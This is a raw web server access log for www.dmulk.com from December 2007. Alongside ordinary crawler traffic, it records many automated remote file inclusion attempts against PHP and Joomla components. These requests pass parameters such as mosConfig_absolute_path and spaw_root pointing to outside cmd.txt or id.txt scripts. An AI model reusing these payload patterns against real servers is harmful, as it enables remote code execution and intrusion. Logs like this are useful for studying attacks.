74.6.22.126 - - [29/Dec/2007:06:34:16 -0800] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:34:23 -0800] "GET /logs/access_071212.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:34:23 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.82 - - [29/Dec/2007:06:34:27 -0800] "GET /logs/access_070905.log HTTP/1.0" 200 42196 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:35:15 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:36:38 -0800] "GET /logs/access_071205.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:06:37:17 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.77 - - [29/Dec/2007:06:38:58 -0800] "GET /logs/access_070929.log HTTP/1.0" 200 98605 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:06:41:01 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:06:41:01 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.59.152.224 - - [29/Dec/2007:06:42:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.59.152.224 - - [29/Dec/2007:06:42:13 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.48.226 - - [29/Dec/2007:06:43:17 -0800] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
75.125.48.226 - - [29/Dec/2007:06:43:17 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:06:44:39 -0800] "GET /appserv/main.php?appserv_root=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:06:44:39 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.6.26.229 - - [29/Dec/2007:06:49:53 -0800] "GET /bikes/dteel/?M=A HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.164.201.47 - - [29/Dec/2007:06:50:09 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.164.201.47 - - [29/Dec/2007:06:50:10 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.164.201.47 - - [29/Dec/2007:06:50:11 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.214.45.100 - - [29/Dec/2007:06:51:11 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.100 - - [29/Dec/2007:06:51:11 -0800] "GET /minamijewelry/html/testimonials.html HTTP/1.0" 200 12446 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
72.36.115.74 - - [29/Dec/2007:06:54:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.74 - - [29/Dec/2007:06:54:01 -0800] "GET /tmp/sess_96f7678a3dbdf723807165b819ccce8f HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:06:54:37 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.187.94 - - [29/Dec/2007:06:56:38 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.187.94 - - [29/Dec/2007:06:56:38 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.187.94 - - [29/Dec/2007:06:56:39 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 27822 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:06:59:18 -0800] "GET /logs/access_070929.log HTTP/1.0" 200 98605 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:06:59:18 -0800] "GET /logs/access_071213.log HTTP/1.0" 200 79346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:06:59:27 -0800] "GET /logs/access_070821.log HTTP/1.0" 200 64221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.49.228 - - [29/Dec/2007:07:00:07 -0800] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.19.49.228 - - [29/Dec/2007:07:00:07 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:07:02:56 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:07:02:57 -0800] "GET /appserv/main.php?appserv_root=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:07:03:15 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:07:03:15 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.6.20.42 - - [29/Dec/2007:07:04:08 -0800] "GET /logs/access_071006.log HTTP/1.0" 200 58327 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [29/Dec/2007:07:04:47 -0800] "GET /megumi/Necklace/11_Pearl_Shell_Flower_Set_30.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
195.70.36.184 - - [29/Dec/2007:07:05:09 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Jyxobot/1" "www.dmulk.com"
68.142.212.185 - - [29/Dec/2007:07:05:14 -0800] "GET /megumi/Bracelet/1_Turquoise_Bracelet_Green_30.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
195.70.36.184 - - [29/Dec/2007:07:05:24 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Jyxobot/1" "www.dmulk.com"
68.142.212.185 - - [29/Dec/2007:07:05:39 -0800] "GET /megumi/Bracelet/2_Carnelian_Orange_Bracelet_30.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.24.203 - - [29/Dec/2007:07:12:23 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:07:14:38 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.115.44 - - [29/Dec/2007:07:17:37 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.44 - - [29/Dec/2007:07:17:37 -0800] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
218.38.34.152 - - [29/Dec/2007:07:23:38 -0800] "GET /logs/access_071215.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [29/Dec/2007:07:23:38 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [29/Dec/2007:07:23:39 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.15.40 - - [29/Dec/2007:07:24:05 -0800] "GET /logs/access_071215.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.15.40 - - [29/Dec/2007:07:24:05 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.15.40 - - [29/Dec/2007:07:24:05 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.141.10 - - [29/Dec/2007:07:24:09 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.15.40 - - [29/Dec/2007:07:24:13 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.141.10 - - [29/Dec/2007:07:25:03 -0800] "GET /logs/access_071215.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [29/Dec/2007:07:25:03 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [29/Dec/2007:07:25:04 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.164.201.47 - - [29/Dec/2007:07:25:24 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.34.152 - - [29/Dec/2007:07:26:42 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.72 - - [29/Dec/2007:07:27:45 -0800] "GET /logs/access_071215.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.72 - - [29/Dec/2007:07:27:46 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.72 - - [29/Dec/2007:07:27:54 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.164.201.47 - - [29/Dec/2007:07:28:36 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.123.8.38 - - [29/Dec/2007:07:31:54 -0800] "GET /logs/access_071214.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fertech.net/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.8.38 - - [29/Dec/2007:07:31:54 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fertech.net/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.8.38 - - [29/Dec/2007:07:31:54 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fertech.net/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.175.72 - - [29/Dec/2007:07:33:43 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [29/Dec/2007:07:39:30 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:07:40:06 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.27.203.44 - - [29/Dec/2007:07:40:26 -0800] "GET /logs/access_071215.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [29/Dec/2007:07:40:27 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [29/Dec/2007:07:40:27 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:07:47:41 -0800] "GET /logs/access_071206.log HTTP/1.0" 200 76911 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:07:47:41 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 205925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:07:50:14 -0800] "GET /logs/access_071214.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:07:50:14 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.20 - - [29/Dec/2007:07:50:14 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [29/Dec/2007:07:52:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [29/Dec/2007:07:52:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:07:52:52 -0800] "GET /megumi/?S=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.35 - - [29/Dec/2007:07:58:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.80 - - [29/Dec/2007:07:58:00 -0800] "GET /logs/access_071003.log HTTP/1.0" 200 36511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.128.49 - - [29/Dec/2007:08:01:08 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:08:03:31 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:08:03:31 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:08:03:31 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.30 - - [29/Dec/2007:08:03:36 -0800] "GET /funny/terryt1.wmv HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.147.74 - - [29/Dec/2007:08:03:48 -0800] "GET /logs/access_071215.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.37 - - [29/Dec/2007:08:11:06 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:08:12:41 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:08:12:41 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:08:12:41 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [29/Dec/2007:08:13:00 -0800] "GET /logs/access_071215.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ropczyce.info/modules/postguestbook/styles/internal/oes/oesn/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.115.50 - - [29/Dec/2007:08:13:55 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.50 - - [29/Dec/2007:08:13:56 -0800] "GET /logs/access_070928.log HTTP/1.0" 200 16581 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
74.6.26.222 - - [29/Dec/2007:08:14:52 -0800] "GET /logs/access_071107.log HTTP/1.0" 200 32202 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:08:18:29 -0800] "GET //skin/zero_vote/error.php?dir=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.9.138 - - [29/Dec/2007:08:20:11 -0800] "GET /logs/access_071103.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [29/Dec/2007:08:20:11 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [29/Dec/2007:08:20:12 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 28395 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [29/Dec/2007:08:20:42 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
203.116.91.37 - - [29/Dec/2007:08:22:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:08:24:13 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:08:24:13 -0800] "GET //skin/zero_vote/error.php?dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:08:24:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:08:24:55 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:08:24:56 -0800] "GET /logs/access_070824.log HTTP/1.0" 200 40957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:08:24:56 -0800] "GET /logs/access_070714.log HTTP/1.0" 200 51386 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:08:24:56 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 40532 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:08:24:59 -0800] "GET /logs/access_070703.log HTTP/1.0" 200 22875 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.9.138 - - [29/Dec/2007:08:26:12 -0800] "GET /logs/access_071103.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [29/Dec/2007:08:26:13 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
